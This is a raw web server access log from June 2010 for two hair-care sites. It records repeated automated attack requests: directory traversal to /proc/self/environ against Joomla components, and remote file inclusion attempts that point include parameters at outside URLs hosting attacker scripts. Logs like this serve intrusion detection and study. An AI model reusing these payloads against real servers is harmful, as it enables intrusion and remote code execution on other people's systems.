213.115.31.121 - - [21/Jun/2010:07:27:05 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.96.137 - - [21/Jun/2010:07:27:13 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
75.125.138.2 - - [21/Jun/2010:07:27:40 -0700] "GET /logs//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:27:40 -0700] "GET /main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:27:40 -0700] "GET /logs/access_091207.log//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:07:27:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:27:51 -0700] "GET /main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:27:51 -0700] "GET /logs//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:27:51 -0700] "GET /logs/access_091207.log%20%20//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:27:53 -0700] "GET /logs/access_100125.log//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:28:07 -0700] "GET /main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:28:07 -0700] "GET /logs/access_091207.log//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:28:07 -0700] "GET /logs//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:07:28:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:28:21 -0700] "GET /main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:28:21 -0700] "GET /logs/access_091207.log%20%20//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:28:21 -0700] "GET /logs//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:28:24 -0700] "GET /logs/access_100125.log//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:29:13 -0700] "GET /logs/access_100125.log%20%20//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.138.2 - - [21/Jun/2010:07:29:36 -0700] "GET /logs/access_100125.log%20%20//main.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.56.55.217 - - [21/Jun/2010:07:29:43 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.56.55.217 - - [21/Jun/2010:07:29:43 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.56.55.217 - - [21/Jun/2010:07:29:43 -0700] "GET /logs/access_100531.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.76.12.197 - - [21/Jun/2010:07:29:50 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.831" "growlonghairfast.com"
216.17.105.143 - - [21/Jun/2010:07:29:51 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.830" "growlonghairfast.com"
195.56.55.217 - - [21/Jun/2010:07:30:03 -0700] "GET /logs/access_100503.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.56.55.217 - - [21/Jun/2010:07:30:03 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.56.55.217 - - [21/Jun/2010:07:30:23 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
195.56.55.217 - - [21/Jun/2010:07:30:23 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:07:30:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
82.76.12.197 - - [21/Jun/2010:07:30:52 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.831" "www.freehairsecrets.com"
216.17.105.143 - - [21/Jun/2010:07:30:55 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.830" "www.freehairsecrets.com"
64.237.56.50 - - [21/Jun/2010:07:31:23 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.237.56.50 - - [21/Jun/2010:07:31:24 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.237.56.50 - - [21/Jun/2010:07:31:24 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.237.56.50 - - [21/Jun/2010:07:32:05 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.237.56.50 - - [21/Jun/2010:07:32:12 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
84.234.77.34 - - [21/Jun/2010:07:33:24 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
84.234.77.34 - - [21/Jun/2010:07:33:32 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.30.129.57 - - [21/Jun/2010:07:33:56 -0700] "GET /logs/access_100111.log/send_reminders.php?includedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [21/Jun/2010:07:38:19 -0700] "GET /logs/access_100111.log/send_reminders.php?includedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:07:40:09 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
213.115.31.121 - - [21/Jun/2010:07:40:09 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
213.115.31.121 - - [21/Jun/2010:07:40:10 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:07:40:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
195.56.55.217 - - [21/Jun/2010:07:41:37 -0700] "GET /logs/access_100531.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.56.55.217 - - [21/Jun/2010:07:41:37 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.56.55.217 - - [21/Jun/2010:07:41:37 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:07:42:54 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:07:42:54 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
213.115.31.121 - - [21/Jun/2010:07:42:54 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:07:44:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:07:44:46 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:07:44:57 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:07:46:04 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:07:46:17 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.201.66.11 - - [21/Jun/2010:07:48:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "growlonghairfast.com"
91.201.66.11 - - [21/Jun/2010:07:48:04 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:48:09 -0700] "GET /index.php?option=com_ckforms&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:07:48:09 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:07:48:09 -0700] "GET /logs//index.php?option=com_ckforms&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
200.146.104.147 - - [21/Jun/2010:07:48:37 -0700] "GET /index.php?option=com_ckforms&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:48:37 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:48:37 -0700] "GET /logs//index.php?option=com_ckforms&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:49:14 -0700] "GET /logs/access.log%20//index.php?option=com_ckforms&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "growlonghairfast.com"
200.146.104.147 - - [21/Jun/2010:07:49:14 -0700] "GET /logs/access.log%20//index.php?option=com_ckforms&controller=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "www.freehairsecrets.com"
81.80.122.44 - - [21/Jun/2010:07:50:47 -0700] "GET /logs/access_100308.log/modifyform.html?code=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [21/Jun/2010:07:50:47 -0700] "GET /modifyform.html?code=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.80.122.44 - - [21/Jun/2010:07:50:48 -0700] "GET /logs/modifyform.html?code=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
64.237.56.50 - - [21/Jun/2010:07:51:26 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.237.56.50 - - [21/Jun/2010:07:51:26 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.237.56.50 - - [21/Jun/2010:07:51:26 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.237.56.50 - - [21/Jun/2010:07:52:49 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.237.56.50 - - [21/Jun/2010:07:52:49 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.237.56.50 - - [21/Jun/2010:07:52:49 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
84.234.77.34 - - [21/Jun/2010:07:55:08 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
84.234.77.34 - - [21/Jun/2010:07:55:08 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
84.234.77.34 - - [21/Jun/2010:07:55:08 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
84.234.77.34 - - [21/Jun/2010:07:55:54 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
84.234.77.34 - - [21/Jun/2010:07:55:54 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
84.234.77.34 - - [21/Jun/2010:07:55:54 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
82.76.12.197 - - [21/Jun/2010:07:56:58 -0700] "GET /logs/access.log/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
82.76.12.197 - - [21/Jun/2010:07:56:58 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.831" "growlonghairfast.com"
82.76.12.197 - - [21/Jun/2010:07:56:58 -0700] "GET /logs/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.831" "growlonghairfast.com"
82.76.12.197 - - [21/Jun/2010:07:59:07 -0700] "GET /logs/access.log/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
82.76.12.197 - - [21/Jun/2010:07:59:07 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.831" "www.freehairsecrets.com"
82.76.12.197 - - [21/Jun/2010:07:59:07 -0700] "GET /logs/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.15.152.183 - - [21/Jun/2010:08:01:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:08:01:32 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
67.15.152.183 - - [21/Jun/2010:08:01:48 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
67.15.152.183 - - [21/Jun/2010:08:01:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
174.142.68.199 - - [21/Jun/2010:08:05:01 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:08:05:06 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.96.137 - - [21/Jun/2010:08:05:07 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
188.40.96.137 - - [21/Jun/2010:08:05:07 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
174.142.68.199 - - [21/Jun/2010:08:05:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
67.228.62.66 - - [21/Jun/2010:08:05:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:08:05:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
193.105.210.165 - - [21/Jun/2010:08:05:34 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "www.freehairsecrets.com"
193.105.210.165 - - [21/Jun/2010:08:05:35 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Creative)" "www.freehairsecrets.com"
188.40.96.137 - - [21/Jun/2010:08:08:08 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:08:08:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.96.137 - - [21/Jun/2010:08:08:08 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
121.78.118.123 - - [21/Jun/2010:08:08:18 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:08:08:19 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:08:08:20 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:08:08:51 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:08:08:52 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [21/Jun/2010:08:08:52 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:08:10:38 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
174.142.68.199 - - [21/Jun/2010:08:14:14 -0700] "GET /logs/access_100503.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.68.199 - - [21/Jun/2010:08:14:14 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.142.68.199 - - [21/Jun/2010:08:14:14 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
216.17.105.143 - - [21/Jun/2010:08:15:02 -0700] "GET /logs/access.log/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "growlonghairfast.com"
216.17.105.143 - - [21/Jun/2010:08:15:02 -0700] "GET /?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.830" "growlonghairfast.com"
216.17.105.143 - - [21/Jun/2010:08:15:02 -0700] "GET /logs/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6086 "-" "libwww-perl/5.830" "growlonghairfast.com"
67.210.98.200 - - [21/Jun/2010:08:17:15 -0700] "GET /logs/access.log/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.210.98.200 - - [21/Jun/2010:08:17:15 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
67.210.98.200 - - [21/Jun/2010:08:17:15 -0700] "GET /logs/pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
89.108.64.232 - - [21/Jun/2010:08:17:31 -0700] "GET /logs/access_100201.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:08:17:31 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.64.232 - - [21/Jun/2010:08:17:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
216.17.105.143 - - [21/Jun/2010:08:18:52 -0700] "GET /logs/access.log/?option=com_gcalendar&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.freehairsecrets.com"
